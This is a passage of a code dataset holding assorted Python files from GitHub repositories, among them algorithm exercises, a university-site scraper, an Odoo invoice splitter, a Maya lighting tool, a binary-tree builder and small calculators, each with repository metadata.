new_suspects_set\n\n\nsuspects_lap1 = iterate_suspects(initial_suspects, 1)\nsuspects_lap2 = iterate_suspects(suspects_lap1, 2)\nsuspects_lap3 = iterate_suspects(suspects_lap2, 3)\nsuspects_lap4 = iterate_suspects(suspects_lap3, 4)\nsuspects_lap5 = iterate_suspects(suspects_lap4, 5)","repo_name":"AlinaZabavkina/Suspected_list","sub_path":"3_task.py","file_name":"3_task.py","file_ext":"py","file_size_in_byte":2473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"31843550989","text":"def maxHist(row):\n result = []\n top_val = 0\n max_area = 0\n area = 0 \n i = 0\n while (i < len(row)):\n if (len(result) == 0) or (row[result[-1]] <= row[i]):\n result.append(i)\n i += 1\n else:\n top_val = row[result.pop()]\n area = top_val * i\n\n if (len(result)):\n area = top_val * (i - result[-1] - 1)\n max_area = max(area, max_area)\n\n while (len(result)):\n top_val = row[result.pop()]\n area = top_val * i\n if (len(result)):\n area = top_val * (i - result[-1] - 1)\n\n max_area = max(area, max_area)\n\n return max_area\n\ndef maxRectangle(A):\n result = maxHist(A[0])\n for i in range(1, len(A)):\n for j in range(len(A[i])):\n if (A[i][j]):\n A[i][j] += A[i - 1][j]\n result = max(result, maxHist(A[i]))\n\n return result\n\n\nn = int(input())\nmat = []\nfor i in range(0, n):\n mat.append([0]*n)\nfor i in mat:\n print(i)\nprint()\na, b , c, d = list(map(int, input().split()))\nfor i in range(a, c+1):\n for j in range(b, d+1):\n mat[i][j] = 1\n\nfor i in mat:\n print(i)\n\narea = maxRectangle(mat)\nprint(area)\n\n","repo_name":"Gokul-raaj-5999/Programming_Coding","sub_path":"My_personal_Coding/#5_find max area in matrix.py","file_name":"#5_find max area in matrix.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"25901018381","text":"import requests\r\nimport time\r\nimport random\r\nimport csv\r\nfrom fake_useragent import UserAgent\r\nfrom bs4 import BeautifulSoup\r\nfrom lxml import etree\r\n\r\n# 每个子标题的深度不一定都是4级,这里采用递归做深度遍历穷尽\r\ndef get_content(url, dict):\r\n try:\r\n # 本来不想加的,鉴于对方服务器稳定性差,还是加了随机等待时间,模拟用户访问\r\n time.sleep(random.randint(5, 10) * 0.1)\r\n page = session.get(url, headers=headers, timeout=10)\r\n page.encoding = 'utf-8'\r\n # print(page.status_code) 仅用于测试获取链接是否成功\r\n tree = etree.HTML(page.text)\r\n # 获取当前页面所有子标题\r\n title_list = tree.xpath('//div[@class=\"grid js-equalizer\"]//div[@class=\"js-equal grid__item grid__box\"]')\r\n # 如果有子标题,则说明当前页面为中间的子节点(非叶子节点),继续遍历他的所有子节点\r\n if len(title_list) > 0:\r\n dict['next'] = []\r\n for title in title_list:\r\n d = {} # 用来存储当前子节点,并与上一级父节点形成关联\r\n d['title'] = title.xpath('./a/h3/text()')[0]\r\n dict['next'].append(d)\r\n href = title.xpath('./a/@href')[0] # 获取下级子节点的链接,进行深度遍历\r\n if href[0] == '/': # 部分链接以//开头,部分直接是https://开头,需对前一个进行处理,否则访问失败\r\n href = 'https:' + href\r\n print(href)\r\n get_content(href, d)\r\n else:\r\n d = {}\r\n d['title'] = tree.xpath('//h1[@class=\"heading heading--overview-main\"]/text()')[0]\r\n dict['next'] = d\r\n # 把所有叶节点的标题和正文存到一个数组里,方便输出\r\n item = BeautifulSoup(page.text, \"html.parser\")\r\n title = tree.xpath('//h1[@class=\"heading heading--overview-main\"]/text()')[0]\r\n content = item.find('div', class_='document').text.replace(' ', '')\r\n a.append([title, content])\r\n except:\r\n print(\"连接超时\")\r\n\r\na = [] # 用于存储所有的叶节点标题+正文内容\r\ndict = {'title': 'home'} # 用于存储所有的子标题,用字典树形结构存储\r\nua = UserAgent() # 随机header头\r\nsession = requests.session()\r\nurl = 'https://ses.leeds.ac.uk/'\r\nheaders = {\r\n 'User-Agent': str(ua.random),\r\n 'Cookie': 'PHPSESSID=re5j7qj3pn3rtaogrrkpctc6kqdhdhnp; TEST_COOKIE_NAME=TEST_COOKIE_VALUE; NSC_QTUHSQ_XFC_QSPEVDUJPO2=ffffffff8203a06945525d5f4f58455e445a4a42378b; _gcl_au=1.1.300417691.1656833020; _ga=GA1.3.510630176.1656833020; _gid=GA1.3.1536792503.1656833020; _gat_UA-12466371-1=1',\r\n} # cookie非必须\r\nget_content(url, dict)\r\n\r\nwith open(\"corpus.csv\", \"w\", newline=\"\", encoding=\"utf-8\") as f:\r\n writer = csv.writer(f)\r\n for k in a:\r\n writer.writerow([k[0],k[1]]) # 输出所有的叶节点标题+正文内容\r\n writer.writerow([dict]) # 输出所有的字典树形结构,实测内容太多了,会被分成多个单元格,需借助在线json进一步做下整理\r\n","repo_name":"ERGOUZA1224/leeds-chatbot","sub_path":"rasa/corpus/webScraping.py","file_name":"webScraping.py","file_ext":"py","file_size_in_byte":3183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"41431407802","text":"filepath= '/Users/kev/Desktop/python/Python-Crash-Course/Chapter_10/text_files/numbers.txt'\n\nwith open(filepath) as file_object:\n contents = file_object.read()\n\npi_string=''\ncount=0\nfor content in contents:\n pi_string+=content\n count +=1\nbirthday=input(\"Enter your birthday, in the form of mmddyy: \")\nif birthday in pi_string:\n print(f\"Your birth of {birthday} is in pi!\")\nelse:\n print(\"Your birthday is not in pi.\")\nbirthint=int(birthday)\nactive=True\nx=0\nwhile active:\n i=pi_string[x:x+4]\n if i !=birthint:\n i=pi_string[x:x+4] \n print(i)\n x+=1\n else:\n print(\"test\")\n active=False\n break\n\n \nprint(f\"{pi_string[:x]}\")\n","repo_name":"kevincleppe/Python-Crash-Course","sub_path":"Chapter_10/file_readerv3.py","file_name":"file_readerv3.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"41523327793","text":"from openerp.osv import osv\nfrom openerp.tools.translate import _\n\n\nclass account_invoice(osv.osv):\n _inherit = 'account.invoice'\n\n def split_invoice(self, cr, uid, ids):\n \"\"\"\n Split the invoice when the lines exceed the maximum set for the company\n \"\"\"\n for inv in self.browse(cr, uid, ids):\n inv_id = False\n if inv.company_id.lines_invoice < 1:\n raise osv.except_osv(\n _('Error !'),\n _('Please set an invoice lines value in:\\n'\n 'Administration->Company->Configuration->Invoice lines'))\n if inv.type in [\"out_invoice\", \"out_refund\"]:\n if len(inv.invoice_line) > inv.company_id.lines_invoice:\n lst = []\n invoice = self.read(\n cr, uid, inv.id,\n ['name', 'type', 'number', 'supplier_invoice_number',\n 'comment', 'date_due', 'partner_id',\n 'partner_contact', 'partner_insite', 'partner_ref',\n 'payment_term', 'account_id', 'currency_id',\n 'invoice_line', 'tax_line', 'journal_id', 'period_id',\n \"user_id\"])\n invoice.update({\n 'state': 'draft',\n 'number': False,\n 'invoice_line': [],\n 'tax_line': [],\n })\n # take the id part of the tuple returned for many2one\n # fields\n invoice.pop('id', None)\n for field in ('partner_id', 'account_id', 'currency_id',\n 'payment_term', 'journal_id', 'period_id',\n 'user_id'):\n invoice[field] = invoice[field] and invoice[field][0]\n\n # if hasattr(inv,'sale_ids'):\n # if self.browse(cr,uid,inv.id,context={}).sale_ids:\n # invoice.update({\n # 'sale_ids':[(6,0,[i.id for i in self.browse(\n # cr,uid,inv.id,context={}).sale_ids])]\n # })\n\n inv_id = self.create(cr, uid, invoice)\n cont = 0\n lst = inv.invoice_line\n while cont < inv.company_id.lines_invoice:\n lst.pop(0)\n cont += 1\n for il in lst:\n self.pool.get('account.invoice.line').write(\n cr, uid, il.id, {'invoice_id': inv_id})\n self.button_compute(cr, uid, [inv.id], set_total=True)\n if inv_id:\n self.button_compute(cr, uid, [inv_id], set_total=True)\n# wf_service.trg_validate(uid, 'account.invoice', inv_id,\n# 'invoice_open', cr)\n return True\n\n def action_date_assign(self, cr, uid, ids, *args):\n \"\"\" Return assigned dat\n \"\"\"\n super(account_invoice, self).action_date_assign(cr, uid, ids, *args)\n self.split_invoice(cr, uid, ids)\n return True\n\naccount_invoice()\n","repo_name":"odoo-venezuela/odoo-venezuela","sub_path":"l10n_ve_split_invoice/model/invoice.py","file_name":"invoice.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"39"} +{"seq_id":"9334793261","text":"from os.path import dirname as dn, join as jp\nfrom typing import List\n\nimport numpy as np\n\nfrom .text_normalizer import normalize\n\n\ndef preprocess_mail(mail: str) -> []:\n # 1. Preprocess mail\n words = normalize(mail)\n\n # 2. Word to indices\n word_indices = map_to_voc_indices(words)\n\n # 3. Features vectorize\n features = extract_features(word_indices)\n\n return features\n\n\ndef map_to_voc_indices(words: [str]) -> [int]:\n word_indices = []\n with open(jp(dn(__file__), 'data', 'dataset', 'vocab.txt')) as f:\n vocab_list = f.read().splitlines()\n for word in words:\n if word in vocab_list:\n i = vocab_list.index(word)\n word_indices.append(i)\n\n return word_indices\n\n\ndef extract_features(word_indices: [int]) -> []:\n n = 1899\n x = np.zeros(n, np.int8)\n\n for i in range(0, len(word_indices)):\n x[word_indices[i]] = 1\n\n return x\n","repo_name":"essamik/spam-classifier-python","sub_path":"spamclassifier/mail_to_features.py","file_name":"mail_to_features.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"21051572369","text":"import maya.cmds as cmds\n\n\nwinID = \"LightLinker\"\nif cmds.window(winID, exists=True):\n cmds.deleteUI(winID)\n\nmyWindow = cmds.window(winID, title = \"Light Linker\", menuBar = True, nde = True, s = True, wh =( 50, 100))\ncmds.rowColumnLayout(nc = 1)\n \ngetLightsBtn = cmds.button( label='Select light(s)', w = 250, h = 30, backgroundColor = [0.588, 0.972, 0.815], command= \"selectLights()\" )\ngetObjectsBtn = cmds.button( label='Select objects to include', w = 250, h = 30, backgroundColor = [0.7, 0.6, 0.815], command= \"selectObjectsToExclude()\" )\nlinkLightsBtn = cmds.button( label='Link lights', w = 250, h = 30, backgroundColor = [0.95, 1.0, 0.4], command= \"linkLights()\" )\n\ncloseBtn = cmds.button( label='Close', w = 150, h = 30, backgroundColor = [0.909, 0.007, 0.286],command= \"quitBtn()\" )\n\ncmds.showWindow( myWindow )\n\ndef quitBtn():\n cmds.deleteUI(myWindow)\n\ndef selectLights():\n global selectedLights\n selectedLights = cmds.ls(selection = True) \n cmds.select(cl = True)\n\ndef selectObjectsToExclude():\n global allDeselectedObjects\n global selectedObjects\n selectedObjects = cmds.ls(sl = True)\n cmds.select(all = True)\n cmds.select(selectedObjects, deselect = True)\n cmds.select(selectedLights, deselect = True)\n allDeselectedObjects = cmds.ls(sl = True)\n cmds.select(cl = True)\n \ndef linkLights():\n cmds.lightlink(b = True, light = selectedLights, object = allDeselectedObjects)\n cmds.lightlink(light = selectedLights, object = selectedObjects)\n\n","repo_name":"codey2015/Maya-Tools","sub_path":"LightLinker.py","file_name":"LightLinker.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"17417113378","text":"# The game() function in a program let's a user to play a game and returns the score as an integer.\r\n# You need to read a file \"HiScore.txt\" which is either blank or contains the previous hi-score.\r\n# So, WAP to update the highscore when games breaks the hi-score. \r\n\r\n\r\ndef game():\r\n \r\n return 94\r\n\r\n\r\nscore=game()\r\nwith open(\"D:\\Python Learning\\Chapter10_File_InputOutput\\\\hi-score.txt\") as fil:\r\n hiscore= fil.read()\r\n\r\nif hiscore==\"\":\r\n with open(\"D:\\Python Learning\\Chapter10_File_InputOutput\\\\hi-score.txt\",\"w\") as fil:\r\n fil.write(str(score))\r\n\r\nelif int(hiscore)= their k value\n loc = person[1]\n retPpl.insert(loc,person)\n \n return retPpl","repo_name":"calumbruton/Leetcode-Solutions-Python","sub_path":"406. Queue Reconstruction by Height.py","file_name":"406. Queue Reconstruction by Height.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"73486366515","text":"from gna.configurator import NestedDict\nfrom gna.expression.preparse import open_fcn\nfrom gna.expression.operation import *\nfrom gna.env import env\nimport re\nimport inspect\n\nclass VTContainer(dict):\n _order=None\n def __init__(self, *args, **kwargs):\n super(VTContainer, self).__init__(*args, **kwargs)\n\n def set_indices(self, indices):\n self._order=indices.order\n\n def __missing__(self, key):\n newvar = Variable(key, order=self._order)\n self[key] = newvar\n return newvar\n\n def __setitem__(self, key, value):\n if isinstance(value, Indexed):\n if value.name is undefinedname and key!='__tree__':\n value.name = key\n value.nindex.arrange(self._order)\n value.expandable=False\n elif inspect.isclass(value) and issubclass(value, Operation):\n value.order=self._order\n\n dict.__setitem__(self, key, value)\n return value\n\nclass Expression(object):\n operations = dict(sum=OSum, prod=OProd, concat=OConcat, accumulate=Accumulate, bracket=bracket)\n tree = None\n def __init__(self, expression, indices=[], **kwargs):\n if isinstance(expression, str):\n self.expressions_raw = [expression]\n elif isinstance(expression, (tuple, list)):\n self.expressions_raw = list(expression)\n else:\n raise Exception('Unsupported expression: {!r}'.format(expression))\n\n cexpr = re.compile('\\\\s*#.*')\n rexpr = re.compile('\\n\\\\s+')\n self.expressions_raw = [ rexpr.sub('', cexpr.sub('', e)) for e in self.expressions_raw ]\n self.expressions = [open_fcn(expr) for expr in self.expressions_raw]\n\n self.globals=VTContainer()\n self.defindices(indices, **kwargs)\n self.set_operations()\n\n def set_operations(self):\n for name, op in self.operations.items():\n self.globals[name]=op\n\n def parse(self):\n if self.tree:\n raise Exception('Expression is already parsed')\n\n self.trees = []\n for expr in self.expressions:\n texpr = '__tree__ = '+expr\n try:\n exec(texpr, self.globals, self.globals)\n tree = self.globals.pop('__tree__')\n except:\n print('Failed to evaluate expression:')\n print(expr)\n raise\n self.trees.append(tree)\n\n self.tree=self.trees[-1]\n\n def guessname(self, ilib, *args, **kwargs):\n lib = dict()\n for k, v in ilib.items():\n v['name'] = k\n lib[v['expr']] = v\n for tree in self.trees:\n tree.guessname(lib, *args, **kwargs)\n\n def __str__(self):\n return self.expressions_raw\n\n def __repr__(self):\n return 'Expression(\"{}\")'.format(self.expressions_raw)\n\n def defindices(self, defs):\n if isinstance(defs, NIndex):\n self.nindex = defs\n else:\n self.nindex = NIndex.fromlist(defs)\n for short, idx in self.nindex.indices.items():\n self.globals[short] = idx\n\n slave=idx.slave\n if slave:\n self.globals[slave.short]=slave\n self.globals.set_indices(self.nindex)\n\n def build(self, context):\n if not self.tree:\n raise Exception('Expression is not initialized, call parse() method first')\n\n context.set_indices(self.nindex)\n for tree in self.trees:\n creq = tree.require(context)\n\n context.build_bundles()\n\n with context:\n for tree in self.trees:\n tree.bind(context)\n\nclass ExpressionContext(object):\n indices = None\n def __init__(self, cfg, ns=None, inputs=None, outputs=None):\n self.executed_bundles = []\n self.required = dict()\n\n self.cfg = cfg\n self.outputs = NestedDict() if outputs is None else outputs\n self.inputs = NestedDict() if inputs is None else inputs\n self.ns = ns or env.globalns\n\n self.providers = dict()\n for keys, value in cfg.items():\n if isinstance(value, NestedDict) and 'provides' in value:\n value.provides+=[keys]\n keys=value.provides\n\n if not isinstance(keys, (list, tuple)):\n keys=keys,\n\n for key in keys:\n self.providers[key]=value\n\n def __enter__(self):\n self.ns.__enter__()\n\n def __exit__(self, *args, **kwargs):\n self.ns.__exit__(*args, **kwargs)\n\n def namespace(self):\n return self.ns\n\n def set_indices(self, indices):\n self.nindex = indices\n\n @methodname\n def require(self, name, indices):\n cfg = self.required.get(name, None)\n if cfg is None:\n cfg = self.providers.get(name, None)\n if cfg is None:\n if indices:\n for it in indices.iterate():\n self.require(it.current_format(name=name), None)\n return self.required\n\n raise Exception('Do not know how to build '+name)\n\n self.required[name] = cfg\n\n if indices is None:\n printl_debug( 'indices: %s'%(name) )\n return self.required\n\n predefined = cfg.get('indices', None)\n if predefined is None:\n printl_debug( 'indices: %s[%s]'%(name, str(indices)) )\n cfg.indices=indices\n elif not isinstance(predefined, NIndex):\n raise Exception('Configuration should not contain predefined \"indices\" field')\n else:\n printl_debug( 'indices: %s[%s + %s]'%(name, str(predefined), str(indices)) )\n cfg.indices=predefined+indices\n\n return self.required\n\n def build_bundles(self):\n with self.ns:\n done = set()\n for cfg in self.required.values():\n if cfg in done:\n continue\n self.build_bundle(cfg)\n done.add(cfg)\n\n def build_bundle(self, cfg):\n printl_debug('build bundle', cfg.bundle )\n\n from gna.bundle import execute_bundles\n with nextlevel():\n b=execute_bundles( cfg=cfg, context=self )\n\n self.executed_bundles.append(b)\n\n def get_variable(self, name, *idx):\n pass\n\n def get_key(self, name, nidx, fmt=None, clone=None):\n if nidx is None:\n nidx = NIndex()\n if clone is not None:\n clone = '%02d'%clone\n\n if fmt:\n ret = ndix.current_format(fmt)\n if clone:\n ret += '.'+clone\n return ret\n\n nidx = nidx.current_values()\n if clone:\n nidx = nidx + (clone,)\n return (name,)+nidx\n\n def get_output(self, name, nidx=None, clone=None):\n return self.get( self.outputs, name, nidx, 'output', clone=clone )\n\n def set_output(self, output, name, nidx=None, fmt=None, **kwargs):\n import ROOT as R\n if isinstance(output, R.TransformationTypes.OutputHandle):\n output = R.OutputDescriptor(output)\n self.set( self.outputs, output, name, nidx, 'output', fmt, **kwargs )\n return output\n\n def get_input(self, name, nidx=None, clone=None):\n return self.get( self.inputs, name, nidx, 'input', clone=clone )\n\n def set_input(self, input, name, nidx=None, fmt=None, clone=None):\n self.set( self.inputs, input, name, nidx, 'input', fmt, clone)\n return input\n\n def get(self, source, name, nidx, type, clone=None):\n key = self.get_key(name, nidx, clone=clone)\n printl_debug('get {}'.format(type), name, key)\n\n ret = source.get(key, None)\n if not ret:\n raise Exception('Failed to get {} {}[{}]'.format(type, name, nidx, clone))\n\n if isinstance(ret, NestedDict):\n raise Exception('Incomplete index ({!s}) provided (probably). Need at least resolve {!s}'.format(nidx, list(ret.keys())))\n\n return ret\n\n def set(self, target, io, name, nidx, type, fmt=None, clone=None):\n key = self.get_key( name, nidx, fmt, clone )\n printl_debug('set {}'.format(type), name, key)\n target[key]=io\n\n def set_variable(self, name, nidx, var, **kwargs):\n key = '.'.join(self.get_key( name, nidx ))\n printl_debug('set variable', name, key)\n self.ns.reqparameter(key, cfg=var, **kwargs)\n\n # def connect(self, source, sink, nidx, fmtsource=None, fmtsink=None):\n # printl_debug( 'connect: {}->{} ({:s})'.format( source, sink, nidx ) )\n # with nextlevel():\n # output = self.get_output( source, nidx )\n # input = self.get_input( sink, nidx )\n\n # input( output )\n","repo_name":"gnafit/gna","sub_path":"pylib/gna/expression/expression_v00.py","file_name":"expression_v00.py","file_ext":"py","file_size_in_byte":8675,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"39"} +{"seq_id":"23278631535","text":"def format_duration(seconds):\n if seconds == 0:\n return 'now'\n\n s = seconds % 60\n m = seconds % 3600 // 60\n h = seconds % 86400 // 3600\n d = seconds % 31536000 // 86400\n y = seconds // 31536000\n\n A = [y, d, h, m, s]\n b = ['year', 'day', 'hour', 'minute', 'second']\n out = []\n\n for x, y in zip(A, b):\n if x == 1:\n out.append(f'{x} {y}')\n elif x > 1:\n out.append(f'{x} {y}s')\n\n if len(out) > 1:\n return ', '.join(out[:-1]) + ' and ' + out[-1]\n return ''.join(out)\n\nprint(format_duration(3662))","repo_name":"Ramza-i/CW_solutions","sub_path":"examples/Human readable duration format.py","file_name":"Human readable duration format.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"72323911473","text":"def calc_distance(head, tail):\n distance = (head[0] - tail[0]) ** 2 + (head[1] - tail[1]) ** 2\n return distance\n\n\ndef is_tail_adjacent(head, tail):\n distance = calc_distance(head, tail)\n if distance <= 1:\n return True\n\n # diag is distance 2 but considered adjacent for this problem\n if (abs(head[0] - tail[0]) == 1) and (abs(head[1] - tail[1]) == 1):\n return True\n else:\n return False\n\n\ndef move_head(head, direction):\n if direction == \"L\":\n head[1] -= 1\n elif direction == \"R\":\n head[1] += 1\n elif direction == \"U\":\n head[0] += 1\n elif direction == \"D\":\n head[0] -= 1\n\n return head\n\n\ndef move_tail_linearly(head, tail):\n if head[0] == tail[0]:\n if head[1] > tail[1]:\n tail[1] += 1\n else:\n tail[1] -= 1\n else:\n if head[0] > tail[0]:\n tail[0] += 1\n else:\n tail[0] -= 1\n return head, tail\n\n\ndef move_tail_diag(head, tail):\n if head[0] > tail[0]:\n tail[0] += 1\n else:\n tail[0] -= 1\n\n if head[1] > tail[1]:\n tail[1] += 1\n else:\n tail[1] -= 1\n\n return head, tail\n\n\ndef move_tail(head, tail):\n if head[0] == tail[0] or head[1] == tail[1]:\n head, tail = move_tail_linearly(head, tail)\n else:\n head, tail = move_tail_diag(head, tail)\n\n return head, tail\n\n\ndef main():\n\n with open(\"input.txt\") as file:\n\n head = [0, 0]\n tail = [0, 0]\n position_map = {}\n position_map[(tail[0], tail[1])] = True\n for instruction in file.read().split(\"\\n\"):\n [dir, times] = instruction.split(\" \")\n for i in range(int(times)):\n head = move_head(head, dir)\n\n if is_tail_adjacent(head, tail):\n continue\n else:\n head, tail = move_tail(head, tail)\n position_map[(tail[0], tail[1])] = True\n\n print(len(position_map))\n\n # part 2\n with open(\"input.txt\") as file:\n\n head = [0, 0]\n tails = []\n for i in range(9):\n tails.append([0, 0])\n position_map = {}\n position_map[(0, 0)] = True\n for instruction in file.read().split(\"\\n\"):\n [dir, times] = instruction.split(\" \")\n for i in range(int(times)):\n head = move_head(head, dir)\n\n tmp_head = head\n for tail in tails:\n if is_tail_adjacent(tmp_head, tail):\n tmp_head = tail\n continue\n else:\n tmp_head, tail = move_tail(tmp_head, tail)\n tmp_head = tail\n\n position_map[(tails[8][0], tails[8][1])] = True\n\n print(len(position_map))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Jesavino/advent_of_code","sub_path":"2022/9/rope-bridge/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"19849997882","text":"from RandomCoefficientsGenerator import RandSystem\nfrom ThreeVarSystem import ThreeSystemLinearEquation\nfrom TwoVarSystem import TwoSystemLinearEquation\nfrom Printer import SystemsPrinter\n\nfirst_matrix = RandSystem.generate_random_system(2)\nfirst_sys = TwoSystemLinearEquation(first_matrix)\nSystemsPrinter.print_system(first_sys)\nfirst_roots = first_sys.matrix_method()\nSystemsPrinter.print_roots(first_roots)\n\nsecond_matrix = RandSystem.generate_random_system(2)\nsecond_sys = TwoSystemLinearEquation(second_matrix)\nSystemsPrinter.print_system(second_sys)\nsecond_roots = second_sys.kramer_method()\nSystemsPrinter.print_roots(second_roots)\n\nthird_matrix = RandSystem.generate_random_system(3)\nthird_sys = ThreeSystemLinearEquation(third_matrix)\nSystemsPrinter.print_system(third_sys)\nthird_roots = third_sys.matrix_method()\nSystemsPrinter.print_roots(third_roots)\n\nfourth_matrix = RandSystem.generate_random_system(3)\nfourth_sys = ThreeSystemLinearEquation(fourth_matrix)\nSystemsPrinter.print_system(fourth_sys)\nfourth_roots = fourth_sys.matrix_method()\nSystemsPrinter.print_roots(fourth_roots)\n","repo_name":"mshabanov27/LabOP2","sub_path":"Lab5/Python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"72107993393","text":"# -*- coding:UTF-8 -*-\n\n'''\n中序序列和层序序列构造二叉树\n\n思路:\n参见\n\n编程环境:\nPython3.5.2\n\n作者:\nCSDN博客:https://my.csdn.net/yeqiang19910412\nGithub:https://github.com/YeQiang1075736553\n\n日期:\n2018.8.13\n'''\n\nclass Node():\n \"\"\"节点类\"\"\"\n def __init__(self,data=None,lchild=None,rchild=None):\n self.data = data # 表示数据域\n self.lchild = lchild # 表示左子树\n self.rchild = rchild # 表示右子树\n\nclass BinaryTree():\n def __init__(self):\n pass\n\n def in_level_construct_tree(self,mid_order,level_order):\n \"\"\"根据中序序列和层序序列构造二叉树\"\"\"\n if len(mid_order)==0 or len(level_order)==0:\n return None\n # 层序遍历的第一个结点一定是根结点\n root_data = level_order[0]\n root = Node(root_data)\n i = mid_order.index(root_data)\n\n Lin = mid_order[:i] # 利用层序遍历确定的根节点划分出左右子树\n Rin = mid_order[i+1:]\n\n Llevel = []\n Rlevel = []\n for i in range(len(level_order)): # 通过中序序列,找到层序序列中相同的左右子树元素,并按顺序排列\n for j in range(len(Lin)):\n if level_order[i] == Lin[j]:\n Llevel.append(level_order[i])\n for i in range(len(level_order)):\n for j in range(len(Rin)):\n if level_order[i] == Rin[j]:\n Rlevel.append(level_order[i])\n\n root.lchild = self.in_level_construct_tree(Lin,Llevel)\n root.rchild = self.in_level_construct_tree(Rin,Rlevel)\n\n return root\n\n def pre_order_traverse(self,root):\n \"\"\"递归实现前序遍历\"\"\"\n if root == None:\n return\n print(root.data,end=\" \")\n self.pre_order_traverse(root.lchild)\n self.pre_order_traverse(root.rchild)\n\n def in_order_traverse(self,root):\n \"\"\"递归实现后序遍历\"\"\"\n if root == None:\n return\n self.in_order_traverse(root.lchild)\n print(root.data,end=\" \")\n self.in_order_traverse(root.rchild)\n\n def post_order_traverse(self,root):\n \"\"\"递归实现后序遍历\"\"\"\n if root == None:\n return\n self.post_order_traverse(root.lchild)\n self.post_order_traverse(root.rchild)\n print(root.data,end=\" \")\n\n def level_order_traverse(self, root):\n \"\"\"队列实现层序遍历\"\"\"\n if root == None:\n return\n queue = []\n queue.append(root)\n while queue:\n node = queue.pop(0)\n print(node.data, end=\" \")\n if node.lchild != None:\n queue.append(node.lchild)\n if node.rchild != None:\n queue.append(node.rchild)\n\nif __name__ == '__main__':\n str_mid = \"dgbaechf\"\n str_level = \"abcdefgh\"\n mid_order = list(str_mid)\n level_order = list(str_level)\n binary_tree = BinaryTree()\n root = binary_tree.in_level_construct_tree(mid_order,level_order)\n print(\"递归实现前序遍历\")\n binary_tree.pre_order_traverse(root) # 递归实现前���遍历\n print(\"\\n\")\n print(\"递归实现中序遍历\")\n binary_tree.in_order_traverse(root) # 递归实现中序遍历\n print(\"\\n\")\n print(\"递归实现后序遍历\")\n binary_tree.post_order_traverse(root) # 递归实现后序遍历\n print(\"\\n\")\n print(\"队列实现层序遍历\") # 队列实现层序遍历\n binary_tree.level_order_traverse(root)\n\n\n","repo_name":"YeQiang1075736553/DataStructureAndAlgorithm","sub_path":"Python/3、Tree/in_level_Tree.py","file_name":"in_level_Tree.py","file_ext":"py","file_size_in_byte":3533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"10521317292","text":"import time\nimport requests\nimport json\nimport socket\nimport secret\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\nwhile True:\n try:\n s.bind(('127.0.0.1', 9876))\n break\n except:\n print(\"Retrying bind to port 9876...\")\n time.sleep(5)\n pass\n\nprint(\"Successfully bound to port 9876\")\n\ns.listen(5)\n\ns, address = s.accept()\nprint(\"Connected to \" + str(address))\n\nmsg = s.recv(1024).decode('utf-8')\nmsg = json.loads(msg)\n\npat = secret.TOKEN\napi = \"https://api.github.com\"\nuser = secret.USER\nprint(msg)\n\nprint(\"Creating repository: \" + msg[\"name\"])\nresponse = requests.post(api + \"/user/repos\", data=json.dumps(msg), headers={\"Authorization\": \"token \" + pat})\nresponse.raise_for_status()\n\nrepo_link = \"https://github.com/\" + user + \"/\" + msg[\"name\"]\n\nif response.status_code == 201:\n new_msg = s.send((\"Created repository at: \" + repo_link).encode('utf-8'))\nelse:\n print(\"Error: repository creation failed\")\n\n\n\n\n","repo_name":"goldstem/CS_361-Microservice","sub_path":"repo_test.py","file_name":"repo_test.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"1878035256","text":"# If the bill was $150.00, split between 5 people, with 12% tip.\n\n# Each person should pay (150.00 / 5) * 1.12 = 33.6\n# Format the result to 2 decimal places = 33.60\n\n# Tip: There are 2 ways to round a number. You might have to do some Googling to solve this.💪\n\n# Write your code below this line 👇\n\nprint('Welcome to the tip calculator!')\n\nbill = input('How much was the bill? ')\n\npercentage = input(\n \"How much percentage tip would you like to leave? 10, 12, or 15? \")\n\nguest = input('How many people will be splitting the bill? ')\n\nbill_in_int = float(bill)\n\npercentage_in_int = int(percentage)\n\nguest_in_int = int(guest)\n\ntip = (percentage_in_int / 100) * bill_in_int\n\nprint(round((tip + bill_in_int) / guest_in_int))\n\n\n# can be refactored and made cleaner.\n","repo_name":"carlpadilla/daily_coding_challenges","sub_path":"Python_challenges/tip_calculator.py","file_name":"tip_calculator.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"27649504778","text":"lst = []\na = int(input(\"Enter number of elements : \"))\n \nfor i in range(0, a):\n ele = int(input())\n \n lst.append(ele) \n\nrecv=[]\nrecv_ack=[]\n\nack_index=1\nstart=1\nend=3\nwhile len(lst)>=len(recv):\n if ack_index %3 ==0:\n print(f\"Ack for index {ack_index} not recieved\")\n print(f\"Sending frames again {start-1} to {end-1}\")\n ack_index+=1\n else:\n print(f\"Sending {start} to {end}\")\n start+=1\n 